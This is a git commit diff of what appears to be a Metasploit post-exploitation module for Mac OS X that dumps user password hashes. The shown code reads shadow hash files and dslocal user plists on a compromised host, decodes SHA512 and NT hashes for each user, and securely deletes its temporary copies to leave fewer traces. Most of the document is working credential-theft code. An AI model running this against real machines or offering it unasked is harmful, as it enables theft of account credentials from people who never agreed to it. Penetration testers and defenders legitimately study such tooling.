removed unused code and added comments, also improve a bit the extraction of the hashes in the case Lion is configured and integrated with AD
git-svn-id: file:///home/svn/framework3/trunk@13125 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
7f743a5c1b
commit
0f7166335d
|
@ -88,6 +88,7 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
return fields
|
||||
end
|
||||
|
||||
# Function for creating the folder for gathered data
|
||||
def log_folder_create(log_path = nil)
|
||||
#Get hostname
|
||||
|
@ -116,12 +117,8 @@ class Metasploit3 < Msf::Post
|
|||
# Checks if running as root on the target
|
||||
def check_root
|
||||
# Get only the account ID
|
||||
case session.type
|
||||
when /shell/
|
||||
id = session.shell_command_token("/usr/bin/id -ru").chomp
|
||||
when /meterpreter/
|
||||
id = cmd_exec("/usr/bin/id","-ru").chomp
|
||||
end
|
||||
id = cmd_exec("/usr/bin/id","-ru").chomp
|
||||
|
||||
if id == "0"
|
||||
return true
|
||||
else
|
||||
|
@ -133,12 +130,7 @@ class Metasploit3 < Msf::Post
|
|||
# Enumerate the OS Version
|
||||
def get_ver
|
||||
# Get the OS Version
|
||||
case session.type
|
||||
when /meterpreter/
|
||||
osx_ver_num = cmd_exec("/usr/bin/sw_vers", "-productVersion").chomp
|
||||
when /shell/
|
||||
osx_ver_num = session.shell_command_token("/usr/bin/sw_vers -productVersion").chomp
|
||||
end
|
||||
osx_ver_num = cmd_exec("/usr/bin/sw_vers", "-productVersion").chomp
|
||||
|
||||
return osx_ver_num
|
||||
end
|
||||
|
@ -149,12 +141,9 @@ class Metasploit3 < Msf::Post
|
|||
users = []
|
||||
nt_hash = nil
|
||||
host,port = session.tunnel_peer.split(':')
|
||||
case session.type
|
||||
when /meterpreter/
|
||||
users_folder = cmd_exec("/bin/ls","/Users")
|
||||
when /shell/
|
||||
users_folder = session.shell_command_token("/bin/ls /Users")
|
||||
end
|
||||
|
||||
users_folder = cmd_exec("/bin/ls","/Users")
|
||||
|
||||
users_folder.each_line do |u|
|
||||
next if u.chomp =~ /Shared|\.localized/
|
||||
users << u.chomp
|
||||
|
@ -168,43 +157,51 @@ class Metasploit3 < Msf::Post
|
|||
# Process each user
|
||||
users.each do |user|
|
||||
if ver_num =~ /10\.(6|5)/
|
||||
case session.type
|
||||
when /meterpreter/
|
||||
guid = cmd_exec("/usr/bin/dscl", "localhost -read /Search/Users/#{user} | grep GeneratedUID | cut -c15-").chomp
|
||||
when /shell/
|
||||
guid = session.shell_command_token("/usr/bin/dscl localhost -read /Search/Users/#{user} | grep GeneratedUID | cut -c15-").chomp
|
||||
end
|
||||
|
||||
guid = cmd_exec("/usr/bin/dscl", "localhost -read /Search/Users/#{user} | grep GeneratedUID | cut -c15-").chomp
|
||||
|
||||
elsif ver_num =~ /10\.(4|3)/
|
||||
case session.type
|
||||
when /meterpreter/
|
||||
guid = cmd_exec("/usr/bin/niutil","-readprop . /users/#{user} generateduid").chomp
|
||||
when /shell/
|
||||
guid = session.shell_command_token("/usr/bin/niutil -readprop . /users/#{user} generateduid").chomp
|
||||
end
|
||||
|
||||
guid = cmd_exec("/usr/bin/niutil","-readprop . /users/#{user} generateduid").chomp
|
||||
|
||||
elsif ver_num =~ /10\.(7)/
|
||||
|
||||
require 'rexml/document'
|
||||
hash_decoded = ""
|
||||
|
||||
# get list of profiles present in the box
|
||||
profiles = cmd_exec("ls /private/var/db/dslocal/nodes/Default/users").split("\n")
|
||||
|
||||
if profiles
|
||||
profiles.each do |p|
|
||||
# Skip none user profiles
|
||||
next if p =~ /^_/
|
||||
next if p =~ /^daemon|root|nobody/
|
||||
|
||||
# Turn profile plist in to XML format
|
||||
cmd_exec("cp /private/var/db/dslocal/nodes/Default/users/#{p.chomp} /tmp/")
|
||||
cmd_exec("plutil -convert xml1 /tmp/#{p.chomp}")
|
||||
file = cmd_exec("cat /tmp/#{p.chomp}")
|
||||
plist_values = read_ds_xml_plist(file)
|
||||
|
||||
# Clean up using secure delete overwriting and zeroing blocks
|
||||
cmd_exec("/usr/bin/srm -m -z /tmp/#{p.chomp}")
|
||||
|
||||
# Process XML Plist into a usable hash
|
||||
plist_values = read_ds_xml_plist(file)
|
||||
|
||||
# Extract the shadow hash data, decode it and format it
|
||||
plist_values['ShadowHashData'].join("").unpack('m')[0].each_byte do |b|
|
||||
hash_decoded << sprintf("%02X", b)
|
||||
end
|
||||
user = plist_values['name']
|
||||
|
||||
# Check if NT HASH is present
|
||||
if hash_decoded =~ /0304524E545D53414C5445442D5348413531324F101/
|
||||
if hash_decoded =~ /4F1010/
|
||||
nt_hash = hash_decoded.scan(/^\w*4F1010(\w*)4F1044/)
|
||||
end
|
||||
hashes = hash_decoded.gsub(/^\w*1044/,"")
|
||||
sha512 = hashes.slice(0..135)
|
||||
|
||||
# Carve out the SHA512 Hash, the first 4 bytes is the salt
|
||||
sha512 = hash_decoded.scan(/^\w*4F1044(\w*)(080B190|080D101E31)/)[0][0]
|
||||
|
||||
print_status("SHA512:#{user}:#{sha512}")
|
||||
file_local_write(sha1_file,"#{user}:#{sha512}")
|
||||
|
@ -232,7 +229,7 @@ class Metasploit3 < Msf::Post
|
|||
)
|
||||
|
||||
# Reset hash value
|
||||
nt_hash = ""
|
||||
nt_hash = nil
|
||||
end
|
||||
# Reset hash value
|
||||
hash_decoded = ""
|
||||
|
@ -242,16 +239,10 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
|
||||
# Extract the hashes
|
||||
case session.type
|
||||
when /meterpreter/
|
||||
sha1_hash = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid} | cut -c169-216").chomp
|
||||
nt_hash = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid} | cut -c1-32").chomp
|
||||
lm_hash = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid} | cut -c33-64").chomp
|
||||
when /shell/
|
||||
sha1_hash = session.shell_command_token("/bin/cat /var/db/shadow/hash/#{guid} | cut -c169-216").chomp
|
||||
nt_hash = session.shell_command_token("/bin/cat /var/db/shadow/hash/#{guid} | cut -c1-32").chomp
|
||||
lm_hash = session.shell_command_token("/bin/cat /var/db/shadow/hash/#{guid} | cut -c33-64").chomp
|
||||
end
|
||||
sha1_hash = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid} | cut -c169-216").chomp
|
||||
nt_hash = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid} | cut -c1-32").chomp
|
||||
lm_hash = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid} | cut -c33-64").chomp
|
||||
|
||||
|
||||
# Check that we have the hashes and save them
|
||||
if sha1_hash !~ /00000000000000000000000000000000/
|
||||
|
|
Loading…
Reference in New Issue